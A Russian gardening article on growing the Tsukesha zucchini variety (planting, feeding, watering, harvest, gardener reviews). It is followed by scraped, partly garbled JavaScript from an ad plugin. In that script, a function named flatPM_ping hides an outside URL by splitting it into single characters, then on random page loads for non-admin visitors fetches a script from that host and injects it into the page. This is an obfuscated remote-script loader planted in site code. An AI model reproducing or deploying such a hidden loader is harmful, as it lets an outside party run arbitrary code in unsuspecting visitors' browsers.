У всех цукини есть одна слабость. Растение слабо противостоит корневой гнили. Первым признаком недуга является появление трещин на стеблях и оголенных корнях. Для излечения открытую корневую систему засыпают сухой дерновой землей с добавлением золы.

Заключение

Кабачок Цукеша понравится всем гурманам, предпочитающим получать к столу ранний овощ. Сорт урожайный, нетребовательный, подойдет для выращивания даже начинающему дачнику.

Кабачок Цукеша: вырасти и ешь

Хотя кабачки относятся к тому же семейству тыквенных, что и огурцы, они почему-то не пользуются таким признанием, как их родственники. Но ведь известно, что кабачки дают высокий урожай и не образуют таких длинных плетей, соответственно, они удобны в выращивании. А сколько вкусных рецептов с кабачками можно найти в поваренных книгах… Кабачки заготавливают в виде икры и в маринадах, используют как основное блюдо — жареными, фаршированными, в виде овощных рагу. Свежие кабачки и в сыром виде хороши, и в салатах. А кто попробовал хоть раз варенье из кабачков, не забудет благородный цвет сиропа и изысканный вкус и аромат нежных ломтиков. Стоит заняться этим овощем всерьёз, ещё и погода располагает к этому.

Описание кабачков Цукеша

Из кабачковых сортов Цукеша признан огородниками лучшим по урожайности. Его плоды содержат больше микроэлементов в пересчёте на сухое вещество и лучше хранятся.

Цукеша — популярный среди огородников сорт: он устойчив к заболеваниям, куст не образует длинных плетей и очень аккуратный. Плоды тёмно-зелёные с мелкими белыми крапинками, гладкие, цилиндрические, созревают рано. У Цукеши высокая урожайность: при правильном уходе она достигает 12 килограммов на квадратный метр грядок.

Собирать урожай кабачков нужно при длине плодов 30–35 см и диаметре 10—12 сантиметров, а то плоды быстро перезревают. От появления первых всходов до получения зрелого кабачка проходит 40—45 дней. Средний вес кабачков в идеале не больше одного килограмма. Другой критерий того, что кабачки не перезрели — плотность кожуры. Кабачки надо собирать, когда кожица протыкается ногтем.

Огородники любят кабачки Цукеша за хороший вкус и высокую урожайность

Особенности посадки

Кабачки — представители семейства тыквенных. Как и их «родственники» — огурцы, патиссоны, арбузы, тыквы, дыни — кабачки требовательны к плодородию почвы. Предпочтительнее сажать кабачки после бобовых, поскольку последние улучшают качество почвы, связывая при помощи бактерий неорганический азот и делая его доступным для усвоения растениями.

Кабачок Цукеша можно сажать после зеленных, лука и чеснока, но только не после представителей собственного семейства. Все тыквенные истощают почву, кроме того, у них общие болезни, и потому лучше их не сажать друг за другом. Вместе с кабачком сажают редис, настурцию, бархатцы и базилик. По мере созревания редис убирается, и на его месте располагаются разросшиеся стебли кабачка. Цветы многофункциональны: привлекают насекомых-опылителей, резким запахом отпугивают вредителей и просто украшают своими яркими головками зелёное море кабачковой листвы.

Видео: сажаем кабачки в открытом грунте

Для кабачков часто применяют и совместные посадки с фасолью и кукурузой. Кукуруза поддерживает вьющиеся стебли фасоли, которая обогащает почву, а плети кабачка застилают ковром грядку, подавляя сорняки. Для посадки кабачков выбираем солнечные участки. Сажать кабачки рекомендуется на расстоянии 70–90 сантиметров друг от друга, при этом можно вначале высадить семена на расстоянии 35—40 сантиметров, а после всхода убрать слабые растения, оставляя сильные мощные плети на нужном удалении.

Если вы решите сажать не семена, а рассаду, то в этом случае высаживать надо сразу на расстоянии 70–90 сантиметров. Важно учесть, что семена кабачков не нужно сильно заглублять, оптимальной считается глубина посадки 4—5 сантиметров.

Как подбирать растения для совместных посадок

Как повысить всхожесть семян

Для улучшения всхожести кабачков некоторые огородники предлагают заранее семена замачивать в растворе с добавлением удобрений (нитрофоски, гуммата калия или натрия). Я предпочитаю не замачивать их, а проводить отбор лучших проростков непосредственно после всхода на грядке.

Кабачки — теплолюбивые растения. Сажаем Цукешу, когда почва основательно прогреется, до температуры не менее двадцати пяти градусов. Лучшее время для посадок в открытый грунт — с конца мая по июнь. Мой сосед практикует посадки кабачков и вовсе после сбора урожая чеснока. В этом случае почва точно прогрета, а за полтора месяца до холодов кабачки успевают вырасти, но при этом не перезревают. Цукеша — быстрый кабачок!

Выращивание кабачков и дальнейший уход

Чтоб обеспечить «прожорливым» кабачкам благоприятные условия роста, лучше заранее подготовить почву. Выкопать лунку, смешать почву из лунки с перепревшим навозом, обильно полить (не менее десяти литров тёплой воды на лунку) и посадить семена или рассаду, засыпав сверху обогащённой почвой.

В дальнейшем сразу после появления цветков можно полить растения настоем крапивы и повторить это мероприятие через 3 недели. Рекомендуется использовать минеральные удобрения, чтоб подкормить кабачок. Для этого через неделю после появления первых всходов в 1 литре воды растворяют 2 грамма «Бутона» и поливают растения из расчёта 0,5 стакана раствора на росток.

Вторую подкормку удобрениями (на литр воды по одной чайной ложке нитрофоски и «Эффектона») делают через десять дней после первой. На каждый росток Цукеши приходится по одному стакану питательной смеси. Я предпочитаю использовать крапиву. Набираю её со всего участка в большую бочку, заливаю водой, оставляю под солнцем на день-два. О готовности настоя узнаю по специфическому запаху.

Цукеша, как и все другие кабачки, нуждается в поливе, особенно во время цветения и при формировании плодов. Уход за кабачками сводится к рыхлению почвы, поливу и прополке, пока кусты кабачков ещё не разрослись, а если вы практикуете плотные совместные посадки, то можно ограничиться только поливом.

При выращивании кабачков, надо следить за урожаем и вовремя собирать его, стимулируя образование новых плодов. И особенность кабачка Цукеша в том, что он не требует особенных условий, нужно только вовремя собирать плоды и поливать. Поливать кабачок опытные огородники рекомендуют под корень, чтоб не смачивать листья, и, желательно, вечером. Частота полива зависит от погоды, не чаще одного раза в семь-десять дней. Перед сбором урожая кабачки не поливаем!

Фотогалерея: кабачок Цукеша — от семян до урожая

Кабачки Цукеша хорошо переносят транспортировку и, по отзывам дачников, хранятся до пяти месяцев.

Отзывы огородников о сорте

Это только в характеристиках Цукеши написано, что он весит до 1 кг, а на самом деле, если вовремя не собрать плоды, может до 5 кг и более вырасти. Есть мелкие сорта, длиной всего 18–20 см, из таких знаю только гибрид Голдраш, желтоплодный.

Dauria

http://indasad.ru/forum/62-ogorod/1381-a-kuda-zh-bez-kabachkov?start=10

Кабачки очень неприхотливы и дают урожай практически всегда. Я люблю классику и поэтому каждый год сажу Грибовские (белые). Они могут вырастать просто огромного размера, но самые вкусные — маленькие 6–8 см в диаметре, без семян, поэтому стараюсь собирать их почаще, чтобы не перерастали. Из зелёных мне нравятся цуккини: Зебра и Цукеша. Про спагетти только слышала, теперь тоже захотелось попробовать. И ещё — для нужд нашей семьи из четырёх человек вполне достаточно 4–5 растений. Хватает и пожарить, и на овощное рагу, и на кабачковую икру, и на маринованные, поэтому мне кажется, не стоит засаживать ими всю дачу — ведь есть ещё много полезных растений.

ALINA44

http://indasad.ru/forum/62-ogorod/1381-a-kuda-zh-bez-kabachkov?start=10

Сорт кабачков Цукеша выращиваю первое лето. Мне он понравился. Во-первых, очень нежная мякоть, во-вторых, это кустовой сорт и занимает мало места на огороде, и в третьих, отличный вкус у этого кабачка.

Лариса Лагодина

https://pomidorchik.com.ua/semena-v-profpakete/kabachki-tsukesha-profpaket/reviews/

Кабачок — благодарная культура! Не требует титанических усилий при выращивании, но радует огородников уже с появлением первых всходов. А как красиво смотрятся яркие граммофоны цветов среди изумрудной листвы! Как только начинают поспевать кабачки, включается азарт хозяек: какие ещё придумать блюда из Цукеши? Нежный диетический суп-пюре, салат из свежих кабачков с укропом, кабачки, фаршированные мясом или сыром с чесноком, кабачковые оладьи. А я помню, что недорогая и вкусная кабачковая икра в студенчестве оставалась спасительным якорем, не дававшим пойти ко дну в ожидании стипендии. Можно возделывать кабачки, можно покупать, но не любить этот овощ нельзя!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};